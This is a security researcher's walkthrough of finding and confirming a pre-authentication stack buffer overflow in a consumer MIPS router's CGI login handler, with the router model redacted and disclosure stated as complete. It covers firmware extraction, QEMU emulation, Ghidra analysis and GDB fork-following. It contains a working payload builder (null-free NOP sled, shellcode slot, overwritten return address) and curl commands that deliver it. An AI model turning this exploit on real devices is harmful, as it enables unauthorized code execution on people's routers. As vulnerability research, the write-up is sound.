Firmware Hacking: From Router Firmware to Buffer Overflow on MIPS

Franciszek Malek

Mar 27, 2026


The first time I tried to debug a CGI binary on a MIPS router, GDB killed the session after one HTTP request. The process forked, handled the request, and exited. Session gone. No breakpoint hit. I reconnected, sent another request, same result. The tutorials I found either debugged the binary directly (skipping the problem) or stopped at "attach GDB to the process" without mentioning that the process dies in 200 milliseconds.

That was the easy part. The NOP sled I tried to use encoded as null bytes - which terminated the sprintf that carried my payload. The stack address I measured was off by megabytes because I measured it outside of lighttpd's execution environment. The return address I needed to overwrite does not land on the stack the way it does with call and ret on x86 - it lives in the $ra register until the compiler explicitly stores it, and if you don't understand when, you don't know where to aim.

This is a full firmware hacking walkthrough - firmware extraction through Ghidra reverse engineering to confirmed pre-authentication buffer overflow on a consumer MIPS router. Every step documented, including the parts that took hours to figure out. Responsible disclosure is complete and a CVE assignment is pending. It ends at overflow confirmation with ASLR disabled.

What is a buffer overflow? A buffer overflow occurs when a program writes more data into a fixed-size memory buffer than it was designed to hold. The excess data overwrites adjacent memory - including the saved return address that controls where execution continues after the current function returns. By controlling that return address, an attacker redirects execution to injected code or existing code gadgets.

Environment Setup

QEMU System Emulation

Embedded IoT targets run on dedicated hardware with limited debug interfaces. UART access exists on many devices but requires physical modification and soldering. QEMU provides full debugger access, memory inspection, and breakpoints on standard hardware.

Two QEMU modes exist. qemu-user translates individual MIPS binaries on the fly under the host kernel - simpler but inaccurate for kernel-level behavior like ASLR. qemu-system runs a full MIPS virtual machine with its own kernel. ASLR entropy, /proc layout, system call behavior - all consistent with a real embedded device. I use qemu-system.

Do not use a kernel image dumped from the target router. Device kernels are stripped, lack debug support, and were compiled for specific SoC hardware that QEMU's Malta machine model does not replicate. Use a standard Debian MIPS kernel from Aurel32's pre-built images.

sudo qemu-system-mipsel \
  -M malta \
  -kernel vmlinux-3.2.0-4-4kc-malta \
  -hda debian_wheezy_mipsel_standard.qcow2 \
  -append "root=/dev/sda1 console=ttyS0" \
  -nographic \
  -net nic \
  -net user,hostfwd=tcp::8080-:80,hostfwd=tcp::8443-:443,hostfwd=tcp::2222-:22,hostfwd=tcp::4446-:4446

The hostfwd entries map host ports to VM ports. Port 8080 reaches the web server on port 80. Port 2222 reaches SSH. console=ttyS0 directs kernel output to the serial port that QEMU exposes as stdout with -nographic.

Firmware Extraction

Download the firmware archive from the vendor's support page. Transfer it to the VM and extract with binwalk:

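# on the host: copy the archive into the VM
scp -P 2222 firmware.zip root@127.0.0.1:/root/
# inside the VM: unpack the archive (assumed to contain firmware.bin), then extract
unzip firmware.zip
binwalk -Me firmware.bin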

The result is a squashfs-root/ directory containing the router's complete userland - bin/, lib/, usr/, www/, everything. Before entering the chroot, bind-mount virtual filesystems:

mount --bind /proc squashfs-root/proc
mount --bind /dev squashfs-root/dev
mount --bind /sys squashfs-root/sys
chroot squashfs-root/ /bin/sh

You are now running the router's userland on a full MIPS kernel with access to a working debugger.

Static GDBServer

The router's filesystem does not include a debugger. Drop in a statically compiled gdbserver - a single self-contained MIPSEL binary with no library dependencies:

scp -P 2222 gdbserver-mipsel-static root@127.0.0.1:/root/squashfs-root/gdbserver
chmod +x /root/squashfs-root/gdbserver

On the analysis host, install gdb-multiarch for cross-architecture debugging.

Binary Protections

Before reading disassembly, check what mitigations the binary has:

checksec squashfs-root/www/cgi-bin/[target].cgi

Arch:     mipsel-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       No NX
PIE:      No PIE

No stack canary means the saved $ra register can be overwritten with no tripwire. No NX means injected code on the stack can execute directly. No PIE means every function and gadget address is constant across executions. This is representative of consumer router firmware - IoT devices routinely ship without the mitigations that desktop software considers baseline. ASLR, enabled at the kernel level, is the one protection present.
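To make two of those checksec lines less of a black box, here is a minimal sketch of how the PIE and NX verdicts can be read straight from the ELF headers. It is an approximation, not checksec's actual implementation: it handles only 32-bit little-endian ELF files, it does not look for a stack canary, and it assumes that a missing PT_GNU_STACK header means an executable stack. The function name elf32_le_summary is made up for this example.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header that records stack permissions
PF_X = 0x1                  # execute bit in p_flags
ET_DYN = 3                  # e_type used by position-independent executables


def elf32_le_summary(data: bytes) -> dict:
    """Report PIE and executable-stack status for a 32-bit little-endian ELF."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF image")

    # Fixed offsets inside the 52-byte Elf32_Ehdr
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)

    # Assumption in this sketch: no PT_GNU_STACK header means executable stack
    exec_stack = True
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, base)
        (p_flags,) = struct.unpack_from("<I", data, base + 24)
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)

    return {"pie": e_type == ET_DYN, "exec_stack": exec_stack}
```

Calling it on the bytes of the CGI binary (for example the result of reading the file in "rb" mode) should agree with the PIE and NX lines above if the assumptions hold.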

For initial analysis, disable ASLR on the VM:

echo 0 > /proc/sys/kernel/randomize_va_space

Why MIPS Stack Frames Look Different From x86

On x86, ret pops the return address from the stack and jumps to it. On MIPS there is no ret instruction.

Functions return by jumping to the $ra register (jr $ra). A leaf function can leave the return address in $ra for its whole lifetime, but any function that calls another function must preserve it: the compiler saves $ra to the stack in the prologue with sw $ra, offset($sp) and restores it before returning with lw $ra, offset($sp). Overwrite the saved $ra on the stack, and the function jumps to your address when it returns.

The prologue also saves whichever of the callee-saved registers $s0 through $s7 the function uses. These are restored from the stack before the return. When they sit between the target buffer and the saved $ra, an overflow overwrites all of them before reaching $ra. This is useful - it means you control those registers going into any ROP chain.
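A small sketch of what "controlling those registers" looks like in payload terms. The slot order below is an assumption: it follows the layout GCC commonly produces for o32 frames ($s0 at the lowest address, $ra at the highest), and the real order must be read from the target function's prologue. The names SAVED_SLOTS and build_saved_area are hypothetical.

```python
import struct

# Hypothetical slot order, lowest address first. Verify against the sw
# instructions in the prologue of the function you are targeting.
SAVED_SLOTS = ["s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7", "fp", "ra"]


def build_saved_area(values: dict, filler: int = 0x41414141) -> bytes:
    """Pack one 32-bit little-endian word per saved-register slot, in order."""
    return b"".join(
        struct.pack("<I", values.get(name, filler)) for name in SAVED_SLOTS
    )


# Choose $s0 and $ra explicitly; every other slot gets the filler word.
area = build_saved_area({"s0": 0x11111111, "ra": 0x7FFF59C8})
print(area.hex())
```

Bytes built this way would replace the tail of the padding in an overflow payload, so each register receives a chosen value when the epilogue reloads it.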

Branch Delay Slots

Every branch and jump instruction on MIPS has a branch delay slot: the instruction immediately following the branch always executes before the branch takes effect. This is a pipeline artifact.

jalr  $t9           # call through $t9
move  $a0, $s0      # delay slot - sets $a0 before the jump takes effect

The move executes before control transfers. The compiler fills delay slots with useful work intentionally. Decompilers hide this, but raw disassembly always shows it. Be aware when stepping through code in GDB: stepping over a jalr executes the delay slot instruction first, then transfers.
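The ordering can be illustrated with a toy model. This is not an emulator: it understands only two made-up tuple forms, ("move", dst, src) and ("jalr", reg), and the register values are placeholders. It shows only that the delay-slot instruction has already taken effect at the moment control transfers.

```python
def run_with_delay_slot(program, regs):
    """Toy model of MIPS ordering: returns the state seen when jalr transfers."""
    pc = 0
    while pc < len(program):
        op = program[pc]
        if op[0] == "move":
            regs[op[1]] = regs[op[2]]
            pc += 1
        elif op[0] == "jalr":
            # The instruction after the jump (the delay slot) runs first.
            slot = program[pc + 1]
            if slot[0] == "move":
                regs[slot[1]] = regs[slot[2]]
            return {"target": regs[op[1]], "regs": dict(regs)}
        else:
            raise ValueError(f"unsupported op: {op[0]}")
    return None


# Placeholder values; 0x00401234 is not an address from the target binary.
regs = {"t9": 0x00401234, "s0": 0xDEADBEEF, "a0": 0}
program = [("jalr", "t9"), ("move", "a0", "s0")]
at_call = run_with_delay_slot(program, regs)
print(hex(at_call["regs"]["a0"]))  # $a0 already holds the value copied from $s0
```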

Finding the Vulnerability with Ghidra

The main CGI handler processes all web management requests - authentication, configuration, firmware updates. main alone is thousands of lines of decompiled code. Manually reading it top-to-bottom is not practical.

The strategy: identify dangerous functions, cross-reference their call sites, and evaluate whether arguments are attacker-controlled.

In Ghidra, open the Symbol Tree panel, expand Functions, locate sprintf. Right-click and select Show References To. This lists every call site. For a large CGI binary, there will be dozens.

The filtering approach: cross-reference sprintf usage with code paths reachable via action=login or similar pre-authentication query parameters. Login handlers are high-value targets because they are pre-authentication by definition - no credentials required to reach them - and they routinely process user-supplied strings directly.

One call site in main stands out immediately.

The Vulnerable Code

memset(v32, 0, sizeof(v32));
memset(v34, 0, sizeof(v34));
memset(post_body, 0, sizeof(post_body));

query_string   = getenv("QUERY_STRING");
content_length = getenv("CONTENT_LENGTH");
v5             = strtol(content_length, 0, 10);
v6             = getenv("stationIp");
if (!v6)
    v6 = getenv("REMOTE_ADDR");

v7 = v5 + 1;
v8 = (const char *)malloc(v7);
memset(v8, 0, v7);
fread(v8, 1, v7, stdin);

if (!query_string)
    goto LABEL_15;

if (strstr(query_string, "action=login"))
{
    if (strstr(query_string, "flag=ie8"))
    {
        v31 = (const char *)getenv("http_host");
        sprintf(post_body,
            "{\"topicurl\":\"loginAuth\",\"loginAuthUrl\":\"%s&http_host=%s&flag=ie8\"}",
            v8, v31);
        v11 = post_body;
    }

Reading this carefully:

CONTENT_LENGTH from the environment controls how many bytes fread reads from stdin into v8. The HTTP Content-Length header sets this value. The binary allocates exactly v5 + 1 bytes and reads that many. v8 is fully attacker-controlled in both size and content.

http_host comes from the HTTP Host: header via the environment.

sprintf writes into post_body - a fixed-size stack buffer - using both v8 and v31 as %s arguments with no length check.

The overflow path: POST body -> v8 -> sprintf -> post_body (fixed-size stack buffer). Pre-authentication. No credentials required.

The distance between post_body and the saved $ra slot - confirmed from the prologue sw $ra, 0x128C($sp) - gives the exact overflow offset needed.

How Linux Fork and Exec Affect CGI Stack Layouts

Understanding the kernel-level mechanics explains why CGI debugging is harder than debugging a persistent service - and why stack addresses from one context don't transfer to another.

When lighttpd receives a CGI request, it calls fork(). The child inherits the parent's memory layout. Then execve() replaces the child with the CGI binary. This triggers a full process image replacement: the kernel loads the new binary, sets up a fresh stack, and places arguments and environment variables at the top. The stack base is independently randomized if ASLR is enabled.

The consequence: the CGI binary's stack layout depends on what environment variables lighttpd passes to execve. Each variable adds bytes to the initial stack. The frame offset from the buffer to $ra is identical in both direct invocation and lighttpd execution - that is the compiled frame layout. But the absolute address of the buffer differs by several megabytes depending on how many environment bytes lighttpd passes.

This is the source of the "works in GDB, fails in real execution" problem. Always measure stack addresses under the actual execution environment.
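A rough way to see the environment's contribution is to count the bytes it occupies on the fresh stack. The sketch below is an estimate under stated assumptions: it counts only the "KEY=VALUE" strings with their terminators plus a 32-bit envp pointer array, and ignores argv, the auxiliary vector, and alignment padding. The variable names and values are illustrative, not a dump of what lighttpd actually passes.

```python
def env_stack_bytes(env: dict, pointer_size: int = 4) -> int:
    """Estimate bytes the environment adds to the initial stack after execve."""
    # Each variable is stored as "KEY=VALUE" followed by a null terminator
    strings = sum(len(f"{k}={v}".encode()) + 1 for k, v in env.items())
    # envp[] holds one pointer per variable plus a terminating NULL
    pointers = (len(env) + 1) * pointer_size
    return strings + pointers


# Hypothetical environments for the two invocation styles
direct = {"QUERY_STRING": "action=login&flag=ie8", "CONTENT_LENGTH": "4"}
via_server = dict(
    direct,
    REMOTE_ADDR="10.0.2.2",
    SERVER_SOFTWARE="lighttpd",
    REQUEST_METHOD="POST",
)

print(env_stack_bytes(via_server) - env_stack_bytes(direct))
```

The printed difference is how far this part of the layout moves between the two contexts in this model. It covers only the environment's share, so it is no substitute for measuring the real address under lighttpd.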

Debugging Forked CGI Processes with GDB

This is where most tutorials stop or hand-wave. CGI binaries live for one request, and GDB's default behavior kills the session when the process exits. Here is the workflow that works.

Step 1: Start lighttpd and gdbserver

Inside the chroot:

lighttpd -f /etc/lighttpd/lighttpd.conf
pgrep lighttpd   # note the PID
./gdbserver --multi 0.0.0.0:4446

The --multi flag keeps gdbserver alive between process deaths. Without it, gdbserver exits when the CGI process exits.

Step 2: Connect with extended-remote

set architecture mips:isa32r2
set sysroot /path/to/squashfs-root
target extended-remote 127.0.0.1:4446
attach [lighttpd_pid]
set follow-fork-mode child
set detach-on-fork off
catch exec
continue

The key distinction: target extended-remote instead of target remote. With target remote, the session terminates when the process exits. With extended-remote, the connection survives process deaths.

Step 3: Trigger the CGI

From a second terminal:

curl -s "http://127.0.0.1:8080/[redacted]?action=login&flag=ie8" \
    -d "test" \
    -H "Host: [redacted]"

GDB catches the fork, follows the exec into the CGI binary, and stops at the exec catchpoint.

Step 4: The Reconnection Dance

After the CGI process exits, the child inferior is gone. Most documentation stops here. The natural assumption is to use GDB's inferior switching commands to return to lighttpd - but in practice, inferior management behaves unreliably in this scenario. Processes that have already exited show as <null>, and switching to them produces errors. What works is to drop the connection and re-attach from scratch:

disconnect
target extended-remote 127.0.0.1:4446
attach [lighttpd_pid]
set follow-fork-mode child
set detach-on-fork off
catch exec
continue

Fire another curl request and the sequence repeats. This pattern does not appear in any IoT debugging writeup I found. Most tutorials either debug the CGI directly (avoiding the problem) or leave readers to figure out the reattachment themselves.
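Because the same seven commands are retyped after every request, it can help to generate them once. The sketch below writes them to a GDB command file; the function name reattach_script and the file name reattach.gdb are made up for this example, and the PID is a placeholder you would replace with the output of pgrep lighttpd.

```python
def reattach_script(lighttpd_pid: int, host: str = "127.0.0.1", port: int = 4446) -> str:
    """Return the GDB commands for one disconnect/re-attach cycle."""
    lines = [
        "disconnect",
        f"target extended-remote {host}:{port}",
        f"attach {lighttpd_pid}",
        "set follow-fork-mode child",
        "set detach-on-fork off",
        "catch exec",
        "continue",
    ]
    return "\n".join(lines) + "\n"


# 1234 is a placeholder PID
with open("reattach.gdb", "w") as f:
    f.write(reattach_script(1234))
```

Inside the GDB session, source reattach.gdb then replays the whole cycle in one step.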

Breakpoints Must Use Absolute Addresses

When attached to lighttpd, GDB resolves main to lighttpd's main. A relative breakpoint like break *main+0x710 lands in lighttpd code, not CGI code. Since the binary has no PIE, virtual addresses in Ghidra are real runtime addresses:

break *0x[address from decompiler]

Confirming the Overflow

Generate a de Bruijn cyclic pattern and send it as the POST body:

from pwn import *
pattern = cyclic(5000)
with open("pattern.bin", "wb") as f:
    f.write(pattern)

curl -s "http://127.0.0.1:8080/[redacted]?action=login&flag=ie8" \
    --data-binary @pattern.bin \
    -H "Content-Length: 5000" \
    -H "Host: [redacted]"

After the crash, inspect $ra:

info registers ra

from pwn import *
print(cyclic_find(0x????????))  # substitute the $ra value

The result is the number of bytes from the POST body start to the saved $ra slot - confirming attacker-controlled data overwrites the return address.
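If pwntools is not available on the analysis host, the same idea fits in a few lines of plain Python. This is a minimal sketch of a de Bruijn pattern generator and lookup, not pwntools' implementation; the names cyclic_pattern and pattern_offset are hypothetical, and the lookup assumes a 32-bit little-endian register value.

```python
import struct
from itertools import islice


def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield the bytes of a de Bruijn sequence of order n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic_pattern(length: int, n: int = 4) -> bytes:
    """Return a null-free pattern in which every n-byte window is unique."""
    alphabet = b"abcdefghijklmnopqrstuvwxyz"
    return bytes(islice(de_bruijn(alphabet, n), length))


def pattern_offset(register_value: int, pattern: bytes) -> int:
    """Find a little-endian 32-bit register value in the pattern (-1 if absent)."""
    return pattern.find(struct.pack("<I", register_value))


pattern = cyclic_pattern(5000)
```

Passing the crashed $ra value and the pattern to pattern_offset returns the offset of those four bytes within the POST body.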

One subtlety: the sprintf format string prepends a 40-byte JSON wrapper before the POST body content. The cyclic offset measures from the POST body start, not from the post_body buffer start. This matters when calculating absolute stack addresses.
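The 40-byte figure can be checked directly from the format string in the decompiled code, and the buffer-relative offset follows by addition. In the sketch below, the value 4412 is the offset used in the payload script in this writeup; the helper name offset_from_buffer_start is hypothetical.

```python
# Format string copied from the decompiled sprintf call
FORMAT = b'{"topicurl":"loginAuth","loginAuthUrl":"%s&http_host=%s&flag=ie8"}'

# Everything before the first %s is written ahead of the POST body
prefix = FORMAT.split(b"%s", 1)[0]
prefix_len = len(prefix)


def offset_from_buffer_start(cyclic_offset: int) -> int:
    """Convert an offset measured from the POST body into one from post_body[0]."""
    return prefix_len + cyclic_offset


print(prefix_len, hex(prefix_len))
print(offset_from_buffer_start(4412))
```

The prefix length is also the 0x28 that appears whenever an address is written as $s0 + 0x28: the first byte of the POST body lands that far into post_body.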

Payload Construction and Delivery

MIPS NOP Sled

The MIPS nop instruction encodes as four null bytes. Since sprintf terminates on null bytes, a traditional NOP sled destroys the payload. The standard substitute is slti a2, zero, -1 - a compare-immediate whose only effect is to write 0 to $a2, and whose encoding contains no null bytes:

nop = b"\xff\xff\x06\x28"   # slti a2, zero, -1 - MIPS LE
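Those four bytes can be derived rather than memorized. The sketch below assembles a MIPS I-type instruction from its fields (6-bit opcode, 5-bit rs, 5-bit rt, 16-bit immediate) and packs it little-endian; the helper name encode_itype is made up for this example.

```python
import struct


def encode_itype(opcode: int, rs: int, rt: int, imm: int) -> bytes:
    """Encode a MIPS I-type instruction as a little-endian 32-bit word."""
    word = (opcode << 26) | (rs << 21) | (rt << 16) | (imm & 0xFFFF)
    return struct.pack("<I", word)


SLTI = 0x0A          # opcode for slti
ZERO, A2 = 0, 6      # register numbers for $zero and $a2

sled_insn = encode_itype(SLTI, ZERO, A2, -1)   # slti a2, zero, -1
print(sled_insn.hex())
print(b"\x00" in sled_insn)                    # null-byte check
```

The same helper is a quick way to test other candidate filler instructions for null bytes before building a sled from them.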

Building the Payload

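import struct
import sys

nop      = b"\xff\xff\x06\x28"  # slti a2, zero, -1 (null-free NOP substitute)
nop_sled = nop * 500            # 2000 bytes

# Shellcode file is the first argument; strip trailing null padding
with open(sys.argv[1], "rb") as f:
    shellcode = f.read().rstrip(b"\x00")

OFFSET     = 4412               # bytes from POST body start to saved $ra
STACK_ADDR = 0x7fff59c8         # $s0 + 0x28, measured from GDB with ASLR=0

pre = nop_sled + shellcode
if len(pre) > OFFSET:
    sys.exit("sled + shellcode is longer than OFFSET")
padding = b"A" * (OFFSET - len(pre))
ret     = struct.pack("<I", STACK_ADDR)  # little-endian return address
payload = pre + padding + ret

# sprintf stops at the first null byte, so the payload must not contain one
if b"\x00" in payload:
    sys.exit("payload contains a null byte")

with open("test.bin", "wb") as f:
    f.write(payload)

print(f"total: {len(payload)} bytes")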

Content-Length must match the payload size exactly. fread requests v5 + 1 bytes, where v5 is parsed from the header. If the header value is smaller than the payload file, the read stops short and the return address bytes never reach the buffer.

curl -s "http://127.0.0.1:8080/[redacted]?action=login&flag=ie8" \
    --data-binary @test.bin \
    -H "Content-Length: $(wc -c < test.bin)" \
    -H "Host: [redacted]"

Troubleshooting Payload Delivery

Getting the offset right is half the battle. Confirming the payload bytes land in memory where expected is the other half.

Inspecting the Buffer

Set a breakpoint at the jalr that calls sprintf. Before the call, post_body is zeroed by memset. After the call, inspect:

x/40x $s0

The first 40 bytes contain the JSON prefix. Starting at $s0 + 0x28, you should see the NOP sled bytes repeating. For \xff\xff\x06\x28, GDB displays 0x2806ffff in little-endian word format.

Verify the return address landed at the saved $ra slot:

x/4xb ($sp + 0x128C)

This should show c8 59 ff 7f - the little-endian encoding of 0x7fff59c8.

Failure Signatures

If the Buffer Shows Zeros Instead of Your Sled

- Check that CONTENT_LENGTH matches the actual payload size.
- Verify that fread read the full file: inspect $s5 (the source buffer) before sprintf.
- Confirm the payload file starts with your sled bytes: xxd test.bin | head -5
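Some of these checks can be run on the payload file before it is ever sent. The sketch below is one way to do that, with a hypothetical helper name check_payload; the offset, target address, and sled bytes in the example are the values used in the payload script in this writeup.

```python
import struct


def check_payload(payload: bytes, offset: int, target: int, sled: bytes) -> list:
    """Return a list of problems found; an empty list means every check passed."""
    problems = []
    if b"\x00" in payload:
        problems.append(f"null byte at index {payload.index(0)}")
    if len(payload) != offset + 4:
        problems.append(f"length is {len(payload)}, expected {offset + 4}")
    if payload[offset:offset + 4] != struct.pack("<I", target):
        problems.append("return address bytes are not at the expected offset")
    if not payload.startswith(sled):
        problems.append("payload does not start with the sled instruction")
    return problems


sled = b"\xff\xff\x06\x28"
example = sled * 500 + b"A" * (4412 - 2000) + struct.pack("<I", 0x7FFF59C8)
print(check_payload(example, 4412, 0x7FFF59C8, sled))
```

To check the real file, read test.bin in binary mode and pass its contents in place of example.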

Tracing Execution After the Return

After confirming $ra is set correctly, let the function return and check where execution lands:

break *0x7fff59c8
continue

When the breakpoint hits, inspect surrounding instructions:

x/20i $pc

You should see the NOP sled instructions (slti a2, zero, -1) listed back to back. Single-step with stepi to confirm that they execute in sequence.

Limitations

ASLR-disabled only. STACK_ADDR is a hardcoded value from a single GDB session. With randomize_va_space set back to 2, the stack base changes on every exec and the address is invalid. This demonstrates control flow redirection under lab conditions - not against a live device with full mitigations.

Environment sensitivity. Stack layout under lighttpd differs from direct CGI invocation because lighttpd sets additional environment variables. A different lighttpd configuration or environment variable set shifts the absolute address of the buffer and of the saved $ra slot, and a different firmware revision may change the frame offset as well. Addresses and offsets must be re-derived for each target configuration.

MIPS I-cache / D-cache coherency. On real MIPS hardware, the instruction cache and data cache are separate. When sprintf writes injected code via the data cache, the instruction cache at that address may hold stale content. Jumping to injected code executes whatever was in the instruction cache - producing SIGILL or unpredictable behavior. QEMU does not emulate this split. On real hardware, a cache flush gadget is required, which is one reason ROP chains targeting existing library functions are more reliable than injected shellcode on MIPS.

All injected bytes must be null-free. Any \x00 in the NOP sled or shellcode ends the %s copy at that point. Everything after it in the payload - including the return address - is never copied, so the saved $ra slot never receives your target address.

FAQ

Do I need the physical router device for firmware hacking?

No. The entire workflow runs inside a QEMU virtual machine using a firmware filesystem extracted from a downloaded firmware image. Physical device access is not needed for reverse engineering and overflow confirmation. A physical device would allow testing against real hardware with real ASLR.

Why use qemu-system instead of qemu-user for firmware analysis?

qemu-user runs under the host kernel, meaning /proc/sys/kernel/randomize_va_space controls host ASLR, not MIPS ASLR. Stack layout may differ from real embedded Linux. qemu-system runs a full MIPS kernel and gives accurate behavior for ASLR entropy, /proc layout, and system calls.

Why does my MIPS shellcode not work?

Most likely: cache coherency. On real MIPS hardware, the instruction cache and data cache are separate (Harvard architecture). Code written to the stack via sprintf goes through the data cache. The instruction cache at that address may still hold stale content. On QEMU this is not emulated, so shellcode works in emulation but fails on hardware. Use a cache flush gadget or switch to ROP chains that call existing library functions already in the instruction cache.

What is the MIPS null byte problem?

The MIPS nop instruction encodes as four null bytes (\x00\x00\x00\x00). sprintf copies a %s argument until it encounters a null byte. Any null byte in your payload ends the copy, so everything after it - including the return address - never reaches the stack. Use slti a2, zero, -1 (\xff\xff\x06\x28 on little-endian MIPS) as a null-free NOP substitute.

How do I debug CGI processes that fork and die?

Use gdbserver --multi with target extended-remote. Set follow-fork-mode child, detach-on-fork off, and catch exec. When the CGI exits, disconnect from GDB, reconnect to gdbserver, re-attach to the lighttpd PID, and re-set the fork/exec settings. This is the only reliable cycle - GDB's inferior management does not handle CGI process death well.

Why does the stack address differ between direct CGI invocation and lighttpd?

Lighttpd sets environment variables before execve-ing the CGI binary. Each environment variable adds bytes to the initial stack state. The frame offset from the buffer to $ra is identical in both cases - that is the compiled frame layout. But absolute stack addresses differ by megabytes depending on how many bytes of environment data lighttpd passes to execve. Always measure under the real execution environment.

About This Research

This writeup documents original firmware analysis work on a consumer MIPS router currently available for purchase. The vulnerability was confirmed on a real device, not only in emulation. Responsible disclosure is complete and a CVE assignment is pending.

The methodology - firmware extraction, QEMU emulation, Ghidra static analysis, GDB fork-following for CGI debugging, payload tracing - applies broadly to embedded Linux targets. The specific binary protections absent here are common across a wide class of consumer router firmware compiled before these mitigations became standard.

Security researchers working on similar targets will find the GDB debugging workflow and payload troubleshooting sections the most transferable. The lighttpd attachment pattern and the failure signatures apply regardless of the specific vulnerability or architecture.

This is the kind of firmware hacking and binary exploitation work my team at AFINE does routinely. We have published 150+ CVEs across SAP, Microsoft, IBM, CyberArk, F5, Rapid7, and others. If you are evaluating IoT pentesting or embedded security capabilities, get in touch.
